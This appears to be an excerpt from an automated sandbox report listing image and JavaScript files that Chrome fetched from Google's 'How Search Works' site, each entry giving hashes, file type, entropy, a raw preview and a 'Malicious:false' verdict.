                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i4!3i5!4i256!2m3!1e0!2sm!3i707457569!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=124816
                                                                                                                                                                                                                                                                                          Preview:RIFF. ..WEBPVP8L..../..?..8....../.3.4.6....K...=VM.......x.e...&@.......s.v.....{].......S....].........t..j..4...l.j[K.7..X..z.o..l.......Q....5._..........|.'........w.........6....._*..mC.......I9...oI.)...I....:.J..}..bI.....o......O.. .wwEUs).....v..c%.j..[.|.b..Q7....r.h..V5...{.KL.Gw..4.hk.sM.[Po....d{.x.\....B._.....e....zAU.|.._.=w.../d.........M....j..{.5.....W..c.^...S.hI.....QU5Z.|..k......UU..N..U...!.K..+.)....).....F/.b...B.&..._._...y^1........w.E.A....R....w.BU.)l...%.......x....".d........{...{Jz~.......d-......E6g<..;h.DU5..L.x.R...3.......fK...{VQ.xZ.G.......of.-.y&..... ..c.h8I....K...._.r.....*\7!.j.+Q.......X.....e.$..7...M.ho..j..Z..........y#.....z.C..P.FU..*7...f.!...W..^k%.5...aC,e...w9x~i.c9d....Z</.....1F..l..|..Gh.>..T..^n.!m..Hf..._.E6G({r..j1$C.J.B.NU..w..h%..%x...Z.I...........7.....FV\...1s.X^..o....W..Wnn...k....=j/.s.@Z...iNc........9-.-..Y...|....V...iA..+rA..c4'....:..i.Y.,[..(....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):123324
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992727178191579
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:oU0uqzm8FxKGjoY17UbkDrtFIlcWFQSMnQjBU9sWfSkyiK:ozuLaKGjN1wbkENjBUTfZY
                                                                                                                                                                                                                                                                                          MD5:D820818965598B4239C3F543FDD7EDA8
                                                                                                                                                                                                                                                                                          SHA1:7F376CDAEF20F173A8BB431B0F099C5DC19AA94E
                                                                                                                                                                                                                                                                                          SHA-256:A36E8FB28E44F896B22A16728A1D63ED731052AD2641CC2FD86F5C2C2FBF8BD0
                                                                                                                                                                                                                                                                                          SHA-512:7AF541F3E7A7C5810F74EA1752B0E3BCB31F735941BA9E9D18B33ECB11E6CF6391BFBF1B9E564E22754F2D88D647A8F6F210802819BC9DBB0F5D07932DE9BFA8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/ByIuDjG_OxNhZWu_Bix9cHR32kCnpGrjVaunDIzC9Q75eon4dC4Ei5h2pcD85FyPcjk01iAIXNjCRMA99E2GK6qhjvxYjCzAa_APmw=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..9.MP..6l#. .L`..........r....{-....:'..F.......4U.S.M{.#In...,.o...Z%...j.h....X.....a..................>.H[....=.Z.@I.X. .....).$..Z...!....$hk.l.\.'%.=...3..7...+M....$].`2...)Mr...v.~..%o.......v"Z..i2.j..i....I......<.k..-.\.~'l13..V..kJ..9R....7K..9GJ.&.M..(o>/z...K.."..+.......~../^g.b....!.q....+.{H..0'.%..Y.."=...J...Mj+M.$....:?.Z.&3/.n....<Jd..:?.Z..+I^...7..e.!..ZKR.I.-<-.I..d%k..~.v2.i....H.".._@.....?=....$.Z...@B....u.L..A".9..............mc.%...%..~p..;..I~_...j.[L0T..~Z...`.KkM..[_.v..+.......r...WWb{.9...E.j.~.........L.......{o. ..0X3.;.+.?....L..vZ.&i.k.RH!.V..}?^.......JY..Va..Gc..l.m...j....vqi.....{.z..n.....mS.m..'.D...5..w.Q.r.J.Z...S9..O.....c.X=..5_7../..^ZJ.M...=....?....u.}...Z.6}..|.=..Og.7wM........$. L..(.#..0.x...s......x..O..qu<.....^.ki..*+..:>4K.\*...#.A.h.v.....$.*.,.../.[n[.L...sgw(.../.<>'&K.P..1.........1..Q.#.;..n........|...."......uw......>..>?....P..TT.c.G.G&iMgH...v]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2782
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.86644364761673
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:IbHoPU+4dRpNB7DoJcUgLuIk5QgeUn5+rFcw+ojdv6DVcXOL:IUPudT77wcJ45reUSO5oByeA
                                                                                                                                                                                                                                                                                          MD5:75B4C69FAC6070DF54DB1E1377FBD36E
                                                                                                                                                                                                                                                                                          SHA1:42B7AEC1F24D059CA09253C7F67CEDB3C3307BB0
                                                                                                                                                                                                                                                                                          SHA-256:09DD303147ED39973BD574C4B1FFCC0872C6ACCEF3809B5243D540B1CDE27239
                                                                                                                                                                                                                                                                                          SHA-512:5323186B70CFDE088259502580408EE8CEEF19556E1AFD1455FCF03323F4DFF43B8EDE4199D8CBC317620DF497CDF21055BCDF54939CB7F92DEB2DDFCD180A3D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?._...$8....#.`..m.8.........i$...S.%.......;.U..%B..8K......o.H.:.&.9.v.t..5..nW.&...a.D...DI...J..#._\&...G..@......CJ....X.0.e.f6).... +...(i.;...Y..=k...a..ec.....f6..3.:....Ew..]cz`W.../...1.X.lG0.eG.u............RTjd~5.u4..bID..0Gf`o.C .).-:...n....'6....$MP..}.'"..e...5C..Z@ZF.=I....d`y.c.G...@5.}.^.j.a.rc.5....@.]...0.........xb.....'....f.e6#,..d.0...h.....G.3..Yc43.?....W.@J-wL..3'..0.S...7........E..DO}0..Z~$.-..L1.........?..f.>R..*-.0z.&....`.v..........>^.._.<}......._A.t5.6..Hh.G..._k........g..}.....>:...~....6.`..t.%d.h.0.c.../|.;o...?[~...>...?...U.E.dS...].lF..._.&..._|t..g...g.......N.`..A.e.3.x....K...3...g....>Z%'1=+J&!z,..l..g.......e./....&u..f....4..f0.8._.D...~......%...N..).:..e...7......7...g}...'....@:..4....7..wWG.'._+'.5 .....).h{.....k..+R....CB.Ji..:.2.-3...3.J...H.T..3....&.$t...R.tk.kxK....4m.-...q0(&F..=B.RA...4|&W.-m..Va*DG6=..Z.........I.e...*.H<.A..+.F.'...+..9.A....B..a`.xQ.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1390)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1391
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.170264642532743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:yTI7loogJdG5DQfNe+RfsxkvXCLuCvXihZyDd/RsY8M6yDdgk/dnJpY7lzQtXHmo:77lJgiBQFQxkuJZTddgynY7SmwTuvtI
                                                                                                                                                                                                                                                                                          MD5:F567AA5D3C76C18F9ABEAC37FE878A5F
                                                                                                                                                                                                                                                                                          SHA1:DF0AFC0AC30FF760C0CCA4C3E83C45DB3F95DD12
                                                                                                                                                                                                                                                                                          SHA-256:5C4AFD14A61034C70CA3A1BF8472ABC6CCC03BE980E74298713810D6E436D2D2
                                                                                                                                                                                                                                                                                          SHA-512:1EA54B7B90CA0B36D3874E9D1384059909B05DEDE88C7AAD011610606E542916367135895E81479F07A80A5D2D8A5322B82DDFF1AFB33965E21962C20E64FD2E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{d as c}from"./zRFBfJZH.min.js";import{s as n}from"./ycaG4YXp.min.js";import{e as h}from"./0XPwTFcg.min.js";var u=Object.defineProperty,b=Object.getOwnPropertyDescriptor,v=(s,t,l,r)=>{for(var e=r>1?void 0:r?b(t,l):t,i=s.length-1,o;i>=0;i--)(o=s[i])&&(e=(r?o(t,l,e):o(e))||e);return r&&e&&u(t,l,e),e};let a=class extends n{constructor(){super(...arguments),this.scrollY=0,this.direction=0}connectedCallback(){super.connectedCallback(),window.addEventListener("scroll",this.onScroll.bind(this),{passive:!0})}disconnectedCallback(){super.disconnectedCallback()}disableSticky(){window.removeEventListener("scroll",this.onScroll.bind(this))}firstUpdated(){this.globalNav=this.querySelector("#globalNav"),this.globalNavSpacer=this.querySelector("#globalNavSpacer"),document.querySelector("hsw-jump-nav")?(this.globalNav.setAttribute("has-jump-nav","true"),this.globalNavSpacer.setAttribute("has-jump-nav","true"),this.disableSticky()):(this.globalNav.setAttribute("is-absolute","true"),this.scroll())
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2385
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9000882516009545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:pHFt5DAHPdWpugzz7hBv+lKMZNVoX0pnyMTEU1D94D7ynBkcSMz3dF6xR:alId7nCvxC0p7TEByScSW6/
                                                                                                                                                                                                                                                                                          MD5:81B52D386AF9045F0AD9DF45D6E66680
                                                                                                                                                                                                                                                                                          SHA1:7C8A359105D9C714D559F2D34BBE467596F28B76
                                                                                                                                                                                                                                                                                          SHA-256:AA0592466BFEA130E577DD569CF96EE975CDEB7ABE28D6D4F73B7E709DB2AED3
                                                                                                                                                                                                                                                                                          SHA-512:FB27889C9CF80F8DE9BDB233321A120FA9AB9FC59557EE4D4C9F4F4AABD76AAA59C47F6F48A86EC2B3E47DA67684F53C72B0DB18A303509FC547371C9F2538E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx...m.\U......{gvwv...viK.R..B+...QI.%D.4...S..j......BH}a....5QL...QbP..DeAih.@.....v.O....}...;O....?ov.9.....s....c.1..c.1..c.1..c.1..c.E.UQ..}.r.{!^..Z@....N....p.k..h..r..x}.y.)6......n.,..5.MW....?.;..0_U....Hy-Rz7na#....5.[.b....%.z}Z.N.y%Q.?}_..z.k]......-^..Tu.G7z.GQt..T..:.sw... (.#I.h.8...9....yU...[.Oc.t..................sE\.]g.B4..I.QI@.E...m.8..p.'jY...w...I....Z...Z.."..'7....>\S.U..D.....V.2..;......u.. g..{!......:..[] ...W.[.2U..c...._....o ..J..O...x.8....W.4....j./....{6._....S.2On..H...rCD..|~t_i.be.....v5..R...x.m...&...e...W.n..o.r...L.....l..<....xoq{V..#.n..oh.'J...Qu..m".l..n.*....>.;.[.M..t'....p.(.Vu..?y*.H+...S....ofwLS)J!...s...Lj.q....0j.,[.Q .g0.Hj......x./...G..2Y.,.M..?..)+`...!3...E..TE.6.[Y.x.Fw..[_...u....R...'.@........Q..4....x.N.YH....().$
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 512x314, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):30084
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99495992059937
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:HQ50SkQUyHYQkHzxZQNm6rv3znpsXiksT2g2m8pKP57NN:w/ke1s4malwiJT2gfSExN
                                                                                                                                                                                                                                                                                          MD5:15BA41EFDA6C2E360F49434926F86F7A
                                                                                                                                                                                                                                                                                          SHA1:607D4E0D335C6955F1CE12555C8CADA41491DD24
                                                                                                                                                                                                                                                                                          SHA-256:54931B0EC11C4C57FB9A04E1B8D54026973CB61DA91F8C5313E984109A02A516
                                                                                                                                                                                                                                                                                          SHA-512:C45E7DB434C77FF75999FDD8C7BFE2199E27D3BC092FB2E05D08D2830428F5D81F2315DD812D91CAFD91E22EE3ECDA24C367E610F6413E5CA358B9996D4F05CC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://storage.googleapis.com/gweb-mobius-cdn/hsw/uploads/607d4e0d335c6955f1ce12555c8cada41491dd24.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF|u..WEBPVP8 pu.......*..:.>U$.E#.!....8.D...L.+.. |&....*.....!.?..~3...g.......e}.....o...?.............'.g.....Ow_.......z..V.......7..wo...~r...y. .....................7..>d~g...H.u.....c...>....c._./._..I".._.2..?E...;.W.....?b..zA.c.W|.9w80G...1W.j..o.....U......?&..../Y.%.w...0.IY.E.W\t\.....et9.Lv...B./...:.[.g.Yiw.H.g....S.g.J..5.?m.u....Um\.Z..j..,.?q.....Z....~....o...1...Y.:3....U..k.....=4...r..V}vF.....J....pL.N..Aj..[...8..k.+T...v5ET...!.1n.N......d..2[3.._S.....oo.t...+q ........Ck&.w.It..Vh...E@.......{\...h...b}....*m.~X.h.v-.&..p.Ph....%........T.f...o...Z....lv....@..}.".3c)..6c...+...._3]Q......././.....p...U..(.?.[.4u.......D.....X.d.6c@./..+....8..H/j.......@.FZ."..i..j...N <n\.....w.M...0....z5.<..U.x..a..J.J..#.....Lq.I.i.t.@..u...(..y..l8.......Af.....e.q...M..Vz......,.0...06-@.....'..+0..,......\.S..*..]....y.5..w..h..s.=.@9P:".j;..".1......s.[.v;..l.qw6..'*......yZ......~.P.g%I.x.5...Fs..y...s..t.w.BBC.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2970
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.895994126557624
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:LUxtKz7MmZV/8K1nIpFwPYYL5v2RLHjEleVn+i7gwOs8rm47mSVo8c:LU7KzJVv1naFcYYtv2dBF+i7gBmAmES
                                                                                                                                                                                                                                                                                          MD5:F61EE926FEE6EAC3A039BFC195647036
                                                                                                                                                                                                                                                                                          SHA1:1E695657BAF394E83B8EB8E452FF7B764D97520D
                                                                                                                                                                                                                                                                                          SHA-256:FF74857019BBF14A1E67353D312AEB78A450D403D7BCB6001C253E1769FAC8F6
                                                                                                                                                                                                                                                                                          SHA-512:C89A8FF456872058D4D6ACA881F25E4D994626801F9D15D8036B7A6BD14414CD395558736C83C1798D5B78CE004FE37EFC2347AD4F430295E9A7A327D62732F0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/aTWbsnyhhmgnwKeD6_8X0cdmN12iq1vC2D6dMfw2B36N5Nh73BN1e1IplijPNtzp4IUgiJRRA-4M5e2SLfTIFOfVW09DeezqPYGnXoEfNBliIP4l=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6....aIDATx..{p\U..?..&.J....0....- h.G. ....i.Q..GK.V...N.6E)..Q.J.......:..##....S....).L..4.M.d_.?N...n....{n..g.....w>{.BJI..b.....4..8...N#......g?.|..m.b`).Y ^vm.....<.....72...C..h{...a....{.....g}...8...x.9.*.Y...9..h.......GYy1..-..,...<...`-.&p*..Q.^n..../..........<.x.8.......n`....uRo.a..1..Rb.p?.2p...=*.7...,Bu.v..\zF.'.....,.:.-...</P..X...@....zj...j....C....>.U.:........3T.."..j2..n.....)6..q.._..A...y.`.....x..hN..+dP....w.lO>0.............!.....y....L..h!.5......d...........?R.8X .a|br.....>......T...G&.X...nG..J.Zl...1.6T...Y...\........A...k..S..S..~.9|.2......Oi...\.Ua..%.C..........h.\.....dr..{....:2......6...5.....0.*..[M4..bx.o&...l........qy...FA....".Z.G.K\...~..).....Hk....K...;P.,..h....p,...>_......d.q&......{..Zl.....L...u.....k9"4.M2....>...D5.2-4.>3.dP..C..Bo)S..t..&.:..(...Ps-5.||.h.K\.............`.M.@.w..bd].Gu. `0.d.dLZdeh...............'...&.`\.H...x......pf..q..3u..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (688)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1193
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.342378773687148
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:Hit+AlooWE+DzzfccCh8NivgyBs7vLxS+FGTXnsdDh6lpRNZvNsrJkbBgPlz+3ux:CVlJb+DnfN9Igp7vLxRFGzspkZNZqxv
                                                                                                                                                                                                                                                                                          MD5:F3B21E985E97E8BB641E53351D7D84F4
                                                                                                                                                                                                                                                                                          SHA1:64AA02F81EC0F16A4B838032AF0022D04864B933
                                                                                                                                                                                                                                                                                          SHA-256:FFD6E3EEE3910E5B2CB0C2881A3AB5BBFEA1D1B4A14EEB32D937FB4E2965EF6A
                                                                                                                                                                                                                                                                                          SHA-512:2D6EA8F32BF85B37B450020ABB93A67EB1307D94FE3D49DD72ADDA143CD807F6D1F1E6DEDB871746D0463FC0AC42DA186A7613BF6FBC0D50ADE2A26818E31B48
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/bS7WqXuL.min.js
                                                                                                                                                                                                                                                                                          Preview:import"./44SUZn7a.min.js";import{r as m,s as v,A as d,x as n}from"./ycaG4YXp.min.js";import{e as f}from"./0XPwTFcg.min.js";import{n as c}from"./IYoTYjYE.min.js";import{e as u}from"./p9kcPq91.min.js";import"./5Ss99t85.min.js";const h=":host{display:inline-flex}.container{display:flex;gap:15px}.item{flex:auto}";var b=Object.defineProperty,g=Object.getOwnPropertyDescriptor,a=(s,e,p,r)=>{for(var t=r>1?void 0:r?g(e,p):e,o=s.length-1,l;o>=0;o--)(l=s[o])&&(t=(r?l(e,p,t):l(t))||t);return r&&t&&b(e,p,t),t};let i=class extends v{dispatchClickPage(s){this.dispatchEvent(new CustomEvent("clickPage",{detail:{value:s},bubbles:!0,composed:!0}))}render(){return this.size?n`<div class="container">. ${Array(this.size).fill(0).map((s,e)=>n` <div class="item">. <bds-pagination-item. part="pagination-item". @click=${()=>this.dispatchClickPage(e+1)}. ?active=${e+1===this.value}. ></bds-pagination-item>. </div>`)}. </div
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 425 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):14159
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.885944499704041
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:adfYevTT2mdN2/oZajc3jwqNeyKcTvREyCXQprE:adz2/hjhyKcKyCAp4
                                                                                                                                                                                                                                                                                          MD5:9AAFCE1349E90CDC093ABCA5222FAC0D
                                                                                                                                                                                                                                                                                          SHA1:F5392D43F1D8DDDD0A3C47626A650AEF4E4EB777
                                                                                                                                                                                                                                                                                          SHA-256:15628E790164F24EFCAFA38022947EEA3E6ED4B244B029DB2E67EC16811169AB
                                                                                                                                                                                                                                                                                          SHA-512:5587D4645121D2CDCB3B2C12B12BC6D531FDDB0C90315CDC0571EDF425B17793EC65C00AACCC366343134A34EF4578CBF1597B657648DB76E717A840EAF7F383
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............8......sBIT....|.d... .IDATx...w.\e.>....gf.-I(I.RD..........x...{)*.......C.^.E.........@.=...(.JIBK.s....cf.!.dw3..9g... ..}Bv.....DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD.7.:.Q..YX|.............e......]..j.v..D......W}....-..5..Q.X2v.t.sB....^u._...^...QJ...T.B.<..........p........7_...Q.aI...k.w...l......^.....2...&....*..7..E....}.C[?..UU.tDA...jh..1/...X....3(...N....U}..-..o.j.s..<.Q....jd.A..X,D.R.>....F..@.$u.x<........$.Q....j.?..on..._..P..YZV..W...5q..[xQ.lD]aI.....F]]...K.`..7..........mo.>.......XRD5.x.G.1.\JK.........x....+..||I.hD0.....N.=.).D...1fp...k...x..1O...]......GRD5.d.!.YV.j}l.........{...3Q.aI.....c...Y..NV.o....|i..C.}.........j O%.sd...M;JW....).3Q....j .%... ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):433824
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9995865422463215
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:b8DNK+ZtvctJeG0fwvfUKqiMvTc6rOj/MyzxMN:b4NKCtCJ04HUfPTcfjTM
                                                                                                                                                                                                                                                                                          MD5:B023020DA2F9B337B80F2408819DC15F
                                                                                                                                                                                                                                                                                          SHA1:13B0FB8F9F4168D4E3B0E3E331DA9F003A4D06D9
                                                                                                                                                                                                                                                                                          SHA-256:5D15A8B40EDB664F02BDB5721DEFD48E641FA40ABEDF58070A27A9C390AC6ACA
                                                                                                                                                                                                                                                                                          SHA-512:BA37BE3777982DE06E4FD0EB2BF7E3DB0254261DC213BE0D90D0C43872CE9D90BD712314A95518E86B861F71C5CCAF649A3E2D37321C804DAFC6671E5F4247FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .....X...*....>m0.H$".#.1Z...gm..[.9..A....W.........&s......W..Wf"e#..v..6~.._...|>...~X..?@......x.*...9.......1...?../.yV.W~...o_.}D?....}......?.......~...~L..........._.G..P..?.?..S~m.Z............_..........|....?....W..../.;.|'.?........../Q.e.....o./G.W.w._._./...?......f..._.?...m..?q=..........q~=.{.....z.~....[.O....h.....k.....o.................?..oo....1~......A.....Y........a.."..M..&k....e51.......}.D.E...t.D;.....&.*t...s...C...HB........|...Q.<.K#....\,...7um...%...\.R.....v.#..WC..J..q.._..Es.d.,.'..s...@.s..$.P....iG............m)..lr#9..9...6o..q> .H...f\.J...9.o8K.g.p.X...t.|X'q.}..QN6.;?.in.G.$Z...Oi#.B`W...@..\...ia.....3......G..[..a.O{?7.Ov.......gfx.yn.;.x.!A..\,...2...&.#..vj*u.....9..{..#Xv.6....O:.o............o./u)..i......}.^.<R..,-.>>.....U.0NL.(..n.t..Q.j.1q..I.I*i..#...M...I.NzL7Z.>;..;....i.!.3.....w.x..2..q&8R..)..,....Vv.Jr....!.[..FK.....U@.y..SCr.Oj......&HK+....S....^....{...B...y5....Q...>_.#
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7289
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.944761342190442
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:G3zvPBdqkiUpquAWefoaS2PwrDpKFcycOY:G3NHiL9vf07HMhY
                                                                                                                                                                                                                                                                                          MD5:E42A09AD7ACE95799671B58F3580B3DC
                                                                                                                                                                                                                                                                                          SHA1:C3A876EB222C3844BA014351975173043125ED29
                                                                                                                                                                                                                                                                                          SHA-256:4F0F364FE3689CC2B1188BD0C752E16BA9F98F6EB6A71A8263E22A47B81282AE
                                                                                                                                                                                                                                                                                          SHA-512:2B0969F82FEED22286C7AC4754E0EFE696DB9DF36749C949D4CA45C373B89C9D1B1934F8F7212D0992DCE5DAF151B38AE53E65185725756EA07D9DCDC39ED166
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..]{l.....}..6v..CLZ..'iE|...Q......*R...KP..+.m..t........p.<Hi+.Q...6!!..qH.)..v.._.........2;{.....V.;s....|.|.;/`..X.2...e\...-." . ..........K....!.R.....h9..|...t...T...\D.$...hT..brEE.Tii..5k..pj||.....E.."..I0......n.w. T...i...F>.A..~.A.!....=..C.....&!...g)6.0.SJ[.<....... d...XC.9...k.....O.l..'.m..S.3ZD,i.).........(.rEQ....x^..#."....$.x..... .\..."`I.L)........-.r.\'$..`.....q..w...."....q.........._..._.(...;%..N_....I<...B...>..o|..B....).........n....VUU..V.)....@4...H....)..^....@ .....-[.<..4...L)]u...}.|....T.M<Wa......s.P..CCC..v.'......Xkk.........F0........[.!.m.M.PQQ...r...H$.4./..d.[.?....q...Xt.)....<x`ff.>.N.. RU.+W.D0...W.....Yc.i.ne.E.eeeC..s.....3(..}..@)..}............".....4&''.w...M).."..`.4.tww..'.|.uEQ.n.Ck.....c... .Ys....?..>..E'.RZ...o....Xe......1.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1393
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.76818672377986
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:84ofs4OnVouAEHrxYUjnD9xD7xmm4X+jtZjYPJXGhJO0nH+bAUb8E3ENcPz:8HfjOnCuAELjvDl4ujjvhJdH+vbz0i7
                                                                                                                                                                                                                                                                                          MD5:56128C21AB781A28574BD2B51934B1D3
                                                                                                                                                                                                                                                                                          SHA1:7611E397F449D99340942B9CED59FEE8D7EEFB10
                                                                                                                                                                                                                                                                                          SHA-256:C46856F89997266EF65CC488CC26ADC4BE2E7D74B22270A4F4D2B686345888F1
                                                                                                                                                                                                                                                                                          SHA-512:ECF40C594019F6652D3DDA280DAF8C04CFF01FDFB214F04A3AEA9137F113837FCB0CA88C5CD5FC89532AA3E90D4BFB5B1219DDF937548428496C4B3A19590AA6
                                                                                                                                                                                                                                                                                          Malicious:false
